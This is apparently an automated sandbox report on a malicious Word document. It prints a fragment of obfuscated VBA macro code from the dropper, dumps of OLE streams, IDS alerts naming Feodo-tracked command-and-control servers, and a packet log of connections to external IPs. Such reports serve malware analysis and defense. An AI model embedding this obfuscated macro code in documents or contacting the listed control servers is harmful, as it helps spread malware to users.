     For Each BApwTCG In Bcur5699z4d.Paragraphs
Set dueIMGo = zhliJ
       If Left(BApwTCG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         ruwfBB = BApwTCG.Range.ListFormat.ListString
       ElseIf InStr(BApwTCG.Range.Text, "kkiew") > 1 Then
         jVymJ = BApwTCG.Range.Text
         jVymJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & ruwfBB)
         BApwTCG.Range.Text = jVymJ
         Set BApwTCG.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set XSZpp = DvhBN
     Next BApwTCG
ruwfBB:
   GoTo BlbPRi
     Dim pbPXFg As Paragraph
Set lSOmIHg = wHzvQRHCw
     For Each pbPXFg In Bcur5699z4d.Paragraphs
Set vttGko = OtoVEFFI
       If Left(pbPXFg.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         BlbPRi = pbPXFg.Range.ListFormat.ListString
       ElseIf InStr(pbPXFg.Range.Text, "kkiew") > 1 Then
         SEEmDH = pbPXFg.Range.Text
         SEEmDH = Replace(saw, "sjgwb", "hqkwjbjdasd" & BlbPRi)
         pbPXFg.Range.Text = SEEmDH
         Set pbPXFg.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set IGyeHIDF = tfnHGB
     Next pbPXFg
BlbPRi:
Hbs0geilvqul = Replace(Cxe014lg73v5, "sg yw ah", Zn5_1mdwh2kp2)
   GoTo YfXWF
     Dim aiupjCA As Paragraph
Set HFzCp = aNLHyKGxD
     For Each aiupjCA In Bcur5699z4d.Paragraphs
Set NrnOEeCi = VrzOGkkDJ
       If Left(aiupjCA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         YfXWF = aiupjCA.Range.ListFormat.ListString
       ElseIf InStr(aiupjCA.Range.Text, "kkiew") > 1 Then
         EiZIHkBmm = aiupjCA.Range.Text
         EiZIHkBmm = Replace(saw, "sjgwb", "hqkwjbjdasd" & YfXWF)
         aiupjCA.Range.Text = EiZIHkBmm
         Set aiupjCA.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set LCIxEHv = ykoqBxAG
     Next aiupjCA
YfXWF:
   GoTo dwTYCJwLC
     Dim aqFpElJ As Paragraph
Set aiaDHfVAA = BjqtUGzGV
     For Each aqFpElJ In Bcur5699z4d.Paragraphs
Set WHeXGpVAC = LEeUqk
       If Left(aqFpElJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         dwTYCJwLC = aqFpElJ.Range.ListFormat.ListString
       ElseIf InStr(aqFpElJ.Range.Text, "kkiew") > 1 Then
         wTHGJGJ = aqFpElJ.Range.Text
         wTHGJGJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & dwTYCJwLC)
         aqFpElJ.Range.Text = wTHGJGJ
         Set aqFpElJ.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set KnxFzdf = wuVfVIU
     Next aqFpElJ
dwTYCJwLC:
   GoTo PIEpnIEQ
     Dim DagVrchHi As Paragraph
Set QjbRmCII = ifZhJxP
     For Each DagVrchHi In Bcur5699z4d.Paragraphs
Set QurlJAjI = rQGxCbRtR
       If Left(DagVrchHi.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         PIEpnIEQ = DagVrchHi.Range.ListFormat.ListString
       ElseIf InStr(DagVrchHi.Range.Text, "kkiew") > 1 Then
         xWqeABhHw = DagVrchHi.Range.Text
         xWqeABhHw = Replace(saw, "sjgwb", "hqkwjbjdasd" & PIEpnIEQ)
         DagVrchHi.Range.Text = xWqeABhHw
         Set DagVrchHi.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set wJKPQpiH = NirTjIE
     Next DagVrchHi
PIEpnIEQ:
End Function
                                                                      VBA File Name: Xxuu21l7kiwbxwj_0, Stream Size: 704
                                                                      General
                                                                      Stream Path:Macros/VBA/Xxuu21l7kiwbxwj_0
                                                                      VBA File Name:Xxuu21l7kiwbxwj_0
                                                                      Stream Size:704
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 92 a6 06 e8 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                      VBA Code Keywords

                                                                      Keyword
                                                                      Attribute
                                                                      VB_Name
                                                                      VBA Code
                                                                      Attribute VB_Name = "Xxuu21l7kiwbxwj_0"

                                                                      Streams

                                                                      Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                                                      General
                                                                      Stream Path:\x1CompObj
                                                                      File Type:data
                                                                      Stream Size:146
                                                                      Entropy:4.00187355764
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                      General
                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                      File Type:data
                                                                      Stream Size:4096
                                                                      Entropy:0.280441275353
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 1536
                                                                      General
                                                                      Stream Path:\x5SummaryInformation
                                                                      File Type:data
                                                                      Stream Size:1536
                                                                      Entropy:7.89109371025
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . P . . . . . B . . . . . G . j M . . . M h l . f . N . . . . . . r . . . . . . . a Z # . . . . = . . . 5 . . . ] 9 . H k ^ % . P . . D L . . R . . . . . H . . 0 n . . . . . . . . q W @ . ) . ; x . . . \\ . . . . . . . . . . . # . . . . . l q . e : B . . K Z J . . u . . . . . . * . . _ 6 7 \\ . . s , . . . f . . . X G ( . . W G . E . . Y E . . . q . . / . . . . . - v . . . . . . . . . t \\ . . @ . . . . - . . . . . . . . U a p . . * . . 8 . . I h . ; . P . . . . . ( . 1 . ! . . I . . . . . L U . . d F K
                                                                      Data Raw:9e e2 50 ca ff 20 19 ba 1a 42 ed f4 d8 85 b6 47 83 6a 4d ab 18 0e 4d 68 6c c6 66 d0 4e bc 1c 0b a4 ce 82 72 fa cf 91 fa d4 95 10 61 5a 23 1c cf a0 e0 3d 83 19 bf 35 8f 94 e8 5d 39 ba 48 6b 5e 25 e2 50 0a 03 44 4c b3 d9 52 d6 83 fd ec 0d 48 aa 96 30 6e 7f 99 f2 e4 99 f2 de 12 71 57 40 8b 29 b2 3b 78 d3 11 cb 5c 93 89 aa c7 e9 b1 92 a7 da 14 8f 23 18 fc df 8c ef 6c 71 11 65 3a 42 81
                                                                      Stream Path: 1Table, File Type: data, Stream Size: 6861
                                                                      General
                                                                      Stream Path:1Table
                                                                      File Type:data
                                                                      Stream Size:6861
                                                                      Entropy:6.02892947961
                                                                      Base64 Encoded:True
                                                                      Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                      Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                      Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 517
                                                                      General
                                                                      Stream Path:Macros/PROJECT
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Stream Size:517
                                                                      Entropy:5.51044136587
                                                                      Base64 Encoded:True
                                                                      Data ASCII:I D = " { 2 1 D F 1 D 8 3 - D A C 6 - 4 F C E - A 9 4 D - 2 C 7 0 E C 4 6 E 1 7 0 } " . . D o c u m e n t = B c u r 5 6 9 9 z 4 d / & H 0 0 0 0 0 0 0 0 . . M o d u l e = X x u u 2 1 l 7 k i w b x w j _ 0 . . M o d u l e = N s t 6 o t v n m g m p w . . E x e N a m e 3 2 = " W 9 i 7 s t p l 0 2 4 v g x r " . . N a m e = " Q w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 F 8 D 9 9 E 4 A 7 6 C E A 7 0 E A 7 0 E A 7 0 E A 7 0 " . . D P
                                                                      Data Raw:49 44 3d 22 7b 32 31 44 46 31 44 38 33 2d 44 41 43 36 2d 34 46 43 45 2d 41 39 34 44 2d 32 43 37 30 45 43 34 36 45 31 37 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 42 63 75 72 35 36 39 39 7a 34 64 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 58 78 75 75 32 31 6c 37 6b 69 77 62 78 77 6a 5f 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 73 74 36 6f 74 76 6e 6d 67 6d 70 77 0d 0a 45 78
                                                                      Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 134
                                                                      General
                                                                      Stream Path:Macros/PROJECTwm
                                                                      File Type:data
                                                                      Stream Size:134
                                                                      Entropy:3.95084728485
                                                                      Base64 Encoded:False
                                                                      Data ASCII:B c u r 5 6 9 9 z 4 d . B . c . u . r . 5 . 6 . 9 . 9 . z . 4 . d . . . X x u u 2 1 l 7 k i w b x w j _ 0 . X . x . u . u . 2 . 1 . l . 7 . k . i . w . b . x . w . j . _ . 0 . . . N s t 6 o t v n m g m p w . N . s . t . 6 . o . t . v . n . m . g . m . p . w . . . . .
                                                                      Data Raw:42 63 75 72 35 36 39 39 7a 34 64 00 42 00 63 00 75 00 72 00 35 00 36 00 39 00 39 00 7a 00 34 00 64 00 00 00 58 78 75 75 32 31 6c 37 6b 69 77 62 78 77 6a 5f 30 00 58 00 78 00 75 00 75 00 32 00 31 00 6c 00 37 00 6b 00 69 00 77 00 62 00 78 00 77 00 6a 00 5f 00 30 00 00 00 4e 73 74 36 6f 74 76 6e 6d 67 6d 70 77 00 4e 00 73 00 74 00 36 00 6f 00 74 00 76 00 6e 00 6d 00 67 00 6d 00 70 00
                                                                      Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5553
                                                                      General
                                                                      Stream Path:Macros/VBA/_VBA_PROJECT
                                                                      File Type:data
                                                                      Stream Size:5553
                                                                      Entropy:5.57459869251
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                                      Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                                                      Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 672
                                                                      General
                                                                      Stream Path:Macros/VBA/dir
                                                                      File Type:data
                                                                      Stream Size:672
                                                                      Entropy:6.35085469527
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . Q 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . [ . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . . . m . . . . ! O f f i c
                                                                      Data Raw:01 9c b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 51 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 5b d8 f7 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                                                      Stream Path: WordDocument, File Type: data, Stream Size: 113278
                                                                      General
                                                                      Stream Path:WordDocument
                                                                      File Type:data
                                                                      Stream Size:113278
                                                                      Entropy:7.3453177245
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . ] . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . . U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 ad 5d 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e ba 01 00 62 7f 00 00 62 7f 00 00 ad 55 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      01/27/21-12:17:35.820429TCP1201ATTACK-RESPONSES 403 Forbidden8049165191.6.196.95192.168.2.22
                                                                      01/27/21-12:18:49.250556TCP2404344ET CNC Feodo Tracker Reported CnC Server TCP group 234917580192.168.2.2284.232.229.24
                                                                      01/27/21-12:18:57.070442TCP2404334ET CNC Feodo Tracker Reported CnC Server TCP group 18491768080192.168.2.2251.255.203.164

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 27, 2021 12:17:35.289449930 CET4916580192.168.2.22191.6.196.95
                                                                      Jan 27, 2021 12:17:35.538330078 CET8049165191.6.196.95192.168.2.22
                                                                      Jan 27, 2021 12:17:35.538538933 CET4916580192.168.2.22191.6.196.95
                                                                      Jan 27, 2021 12:17:35.541695118 CET4916580192.168.2.22191.6.196.95
                                                                      Jan 27, 2021 12:17:35.788208008 CET8049165191.6.196.95192.168.2.22
                                                                      Jan 27, 2021 12:17:35.820429087 CET8049165191.6.196.95192.168.2.22
                                                                      Jan 27, 2021 12:17:36.017745018 CET4916580192.168.2.22191.6.196.95
                                                                      Jan 27, 2021 12:17:36.147525072 CET4916680192.168.2.2275.103.81.81
                                                                      Jan 27, 2021 12:17:36.328591108 CET804916675.103.81.81192.168.2.22
                                                                      Jan 27, 2021 12:17:36.328808069 CET4916680192.168.2.2275.103.81.81
                                                                      Jan 27, 2021 12:17:36.329037905 CET4916680192.168.2.2275.103.81.81
                                                                      Jan 27, 2021 12:17:36.511939049 CET804916675.103.81.81192.168.2.22
                                                                      Jan 27, 2021 12:17:36.515872955 CET804916675.103.81.81192.168.2.22
                                                                      Jan 27, 2021 12:17:36.735344887 CET4916680192.168.2.2275.103.81.81
                                                                      Jan 27, 2021 12:17:36.996504068 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:37.249649048 CET44349167177.12.170.95192.168.2.22
                                                                      Jan 27, 2021 12:17:37.249882936 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:37.264085054 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:37.515511990 CET44349167177.12.170.95192.168.2.22
                                                                      Jan 27, 2021 12:17:37.519325018 CET44349167177.12.170.95192.168.2.22
                                                                      Jan 27, 2021 12:17:37.519368887 CET44349167177.12.170.95192.168.2.22
                                                                      Jan 27, 2021 12:17:37.519397974 CET44349167177.12.170.95192.168.2.22
                                                                      Jan 27, 2021 12:17:37.519511938 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:37.532542944 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:37.786819935 CET44349167177.12.170.95192.168.2.22
                                                                      Jan 27, 2021 12:17:37.998981953 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:39.505713940 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:39.758045912 CET44349167177.12.170.95192.168.2.22
                                                                      Jan 27, 2021 12:17:39.761086941 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:39.984756947 CET49170443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.014055014 CET44349167177.12.170.95192.168.2.22
                                                                      Jan 27, 2021 12:17:40.014097929 CET44349167177.12.170.95192.168.2.22
                                                                      Jan 27, 2021 12:17:40.014251947 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:40.014307022 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:40.193675995 CET44349170104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.197443962 CET49170443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.198034048 CET49170443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.404860020 CET44349170104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.404910088 CET44349170104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.404938936 CET44349170104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.404967070 CET44349170104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.405049086 CET49170443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.412507057 CET49170443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.413486004 CET49171443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.615835905 CET44349171104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.616157055 CET49171443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.617010117 CET49171443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.619255066 CET44349170104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.819360018 CET44349171104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.819415092 CET44349171104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.819436073 CET44349171104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.819464922 CET44349171104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.819740057 CET49171443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.822115898 CET8049165191.6.196.95192.168.2.22
                                                                      Jan 27, 2021 12:17:40.822310925 CET4916580192.168.2.22191.6.196.95
                                                                      Jan 27, 2021 12:17:40.823407888 CET49171443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:41.015614033 CET49172443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.025521040 CET44349171104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:41.167398930 CET4434917235.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.167530060 CET49172443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.168284893 CET49172443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.321968079 CET4434917235.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.322031021 CET4434917235.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.322047949 CET4434917235.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.322351933 CET49172443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.324588060 CET49172443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.325530052 CET49173443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.476396084 CET4434917235.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.478358030 CET4434917335.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.478549957 CET49173443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.479553938 CET49173443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.521337986 CET804916675.103.81.81192.168.2.22
                                                                      Jan 27, 2021 12:17:41.521637917 CET4916680192.168.2.2275.103.81.81
                                                                      Jan 27, 2021 12:17:41.632101059 CET4434917335.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.632145882 CET4434917335.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.632209063 CET4434917335.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.632340908 CET49173443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.636425972 CET49173443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.728960991 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:41.788908958 CET4434917335.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.930414915 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:41.930558920 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:41.931462049 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.132985115 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.133199930 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.133224010 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.133238077 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.133246899 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.133414984 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.134701967 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.134721994 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.134824038 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.150039911 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.421269894 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.454632044 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.725614071 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.725673914 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.725712061 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.725749969 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.725789070 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.725826025 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.725898027 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.725954056 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.726008892 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.726030111 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.726048946 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.726087093 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.726125956 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.726164103 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.726188898 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.726218939 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.726254940 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.726291895 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.726680040 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.726880074 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.727863073 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.927913904 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.927975893 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928014040 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928052902 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928090096 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928138971 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928193092 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.928209066 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.928222895 CET49174443192.168.2.2235.163.191.195
